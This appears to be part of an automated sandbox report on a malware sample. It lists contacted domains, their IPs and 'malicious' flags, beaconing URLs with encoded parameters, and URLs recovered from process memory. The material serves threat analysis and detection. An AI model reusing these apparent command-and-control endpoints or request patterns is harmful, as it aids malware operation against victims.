            http://www.anuts.top/li0t/?fhW=BLvXr6e0EhyxeX&YbCL=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfmjHLM7Y8ZEUPvisCvQ4bRBJc30+1Sfiya8KVn3bitTBOxY938FEQPd1w0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
            http://www.gipsytroya.com/tf44/?YbCL=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciyxdfJd/gaB8T0bTbhtXVrFmCpPW1iSF+B9h4XvImdTXjqQBmtK+ZYAHNG&fhW=BLvXr6e0EhyxeX0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg0%Avira URL Cloudsafe
            http://www.Bfiworkerscomp.com0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/Venture_Capital_Firms.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%20%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/Dream_Job_Search.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Bt0%Avira URL Cloudsafe
            https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
            https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            http://www.dmtxwuatbz.cc0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe
            https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/Discussion_Forums.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2B0%Avira URL Cloudsafe
            http://www.helpers-lion.online/mooq/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.sandranoll.com
            		213.145.228.16
            		truetrue
              		unknown
              www.dmtxwuatbz.cc
              		172.67.210.102
              		truetrue
                		unknown
                www.xn--matfrmn-jxa4m.se
                		194.9.94.85
                		truetrue
                  		unknown
                  www.catherineviskadi.com
                  		217.160.0.106
                  		truetrue
                    		unknown
                    www.anuts.top
                    		23.251.54.212
                    		truetrue
                      		unknown
                      www.helpers-lion.online
                      		194.58.112.174
                      		truetrue
                        		unknown
                        www.bfiworkerscomp.com
                        		208.91.197.27
                        		truetrue
                          		unknown
                          parkingpage.namecheap.com
                          		91.195.240.19
                          		truetrue
                            		unknown
                            www.telwisey.info
                            		199.192.19.19
                            		truetrue
                              		unknown
                              www.hprlz.cz
                              		5.44.111.162
                              		truefalse
                                		unknown
                                www.xn--fhq1c541j0zr.com
                                		43.252.167.188
                                		truetrue
                                  		unknown
                                  www.fourgrouw.cfd
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.hatercoin.online
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.tinmapco.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.gipsytroya.com
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.telwisey.info/ei85/?YbCL=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXmSJOUDfP2hLYj3hfUWwVMjhSgAyvEJN1ww7Of4RepeBVRZKy4AbjBLzj&fhW=BLvXr6e0EhyxeXtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.dmtxwuatbz.cc/lfkn/?YbCL=gu3cG9GLpLv0C38agzY8Nc5HI9FnWTYycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT/Ba73/TyhXTi+N+fxoCuIe0q13OxeEQrax/xffncDH6aKqzo3DUBHR/D&fhW=BLvXr6e0EhyxeXtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bfiworkerscomp.com/xzzi/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&YbCL=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazhdUSIVLCtkAjvELp631DJLKvEqqNibis4AF0Y/xQXWBRPCD91/FJrEzfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.dmtxwuatbz.cc/lfkn/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sandranoll.com/aroo/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.gipsytroya.com/tf44/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.xn--matfrmn-jxa4m.se/4hda/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.sandranoll.com/aroo/?fhW=BLvXr6e0EhyxeX&YbCL=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGG0QhvMR72FivEUbGSmkuxinEDBYWWrvqFUEDSzpZ60+MRxZstpJridvktrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.catherineviskadi.com/qe66/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.anuts.top/li0t/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.xn--fhq1c541j0zr.com/rm91/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.helpers-lion.online/mooq/?fhW=BLvXr6e0EhyxeX&YbCL=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGmvwMEDU2l3Vk/j3vF3XZl1x4VY01FUKFB6WA/ZrLtnyfA2FlJPqZ/llTtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bfiworkerscomp.com/xzzi/?fhW=BLvXr6e0EhyxeX&YbCL=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/T4RMdgNWnwSdCIYHgMQCJ4NovZBdigdGOlTiGNjGNRbnTmMSUCfOcFfRtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.xn--fhq1c541j0zr.com/rm91/?fhW=BLvXr6e0EhyxeX&YbCL=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WH8ALvnjmtlYhpciewdwpfxiI173pYZLp0P/Ncxt8Rkrw2XK7hs/fa/r1true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.xn--matfrmn-jxa4m.se/4hda/?YbCL=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9/f3zij1q4lqhkHJ2CNqkydCYpEmp0eXiAcXcwGmcRWkkIq9RVVQfBdjK&fhW=BLvXr6e0EhyxeXtrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.catherineviskadi.com/qe66/?YbCL=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv+z+o+Zy5RZ1L4zwBfly91+2hSvhVojey3gmTZ6j57PRX7U3n66rWnGeG&fhW=BLvXr6e0EhyxeXtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.anuts.top/li0t/?fhW=BLvXr6e0EhyxeX&YbCL=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfmjHLM7Y8ZEUPvisCvQ4bRBJc30+1Sfiya8KVn3bitTBOxY938FEQPd1wtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.telwisey.info/ei85/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.gipsytroya.com/tf44/?YbCL=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciyxdfJd/gaB8T0bTbhtXVrFmCpPW1iSF+B9h4XvImdTXjqQBmtK+ZYAHNG&fhW=BLvXr6e0EhyxeXtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.helpers-lion.online/mooq/true
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabclip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&amp;reg_source=parking_autoclip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://duckduckgo.com/ac/?q=clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://reg.ruclip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bfiworkerscomp.com/Free_Downloads.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2BtVzclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.domaintechnik.at/data/gfx/dt_logo_parking.pngclip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssclip.exe, 00000009.00000002.3768118603.00000000061D6000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000004036000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.domaintechnik.at/fileadmin/gfx/icons/sslserver.pngclip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.comclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://static.loopia.se/shared/images/additional-pages-hero-shape.webpclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/pics/29590/bg1.png)clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lanclip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.ecosia.org/newtab/clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lclip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.jsclip.exe, 00000009.00000002.3768118603.00000000061D6000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000004036000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/contao.pngclip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lclip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&amp;YbCL=0lpTRQcDUHclip.exe, 00000009.00000002.3768118603.00000000053B4000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003214000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1774720636.0000000039E24000.00000004.80000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bfiworkerscomp.com/Alternative_Financing.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&YbCL=0lpTRQcDUHclip.exe, 00000009.00000002.3768118603.00000000053B4000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003214000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1774720636.0000000039E24000.00000004.80000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bfiworkerscomp.com/__media__/js/trademark.php?d=bfiworkerscomp.com&type=nsclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/pics/28903/search.png)clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cdn.consentmanager.netclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.cssclip.exe, 00000009.00000002.3768118603.00000000061D6000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000004036000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&clip.exe, 00000009.00000002.3768118603.000000000668C000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000044EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://static.loopia.se/responsive/images/iOS-72.pngclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/gallery.pngclip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
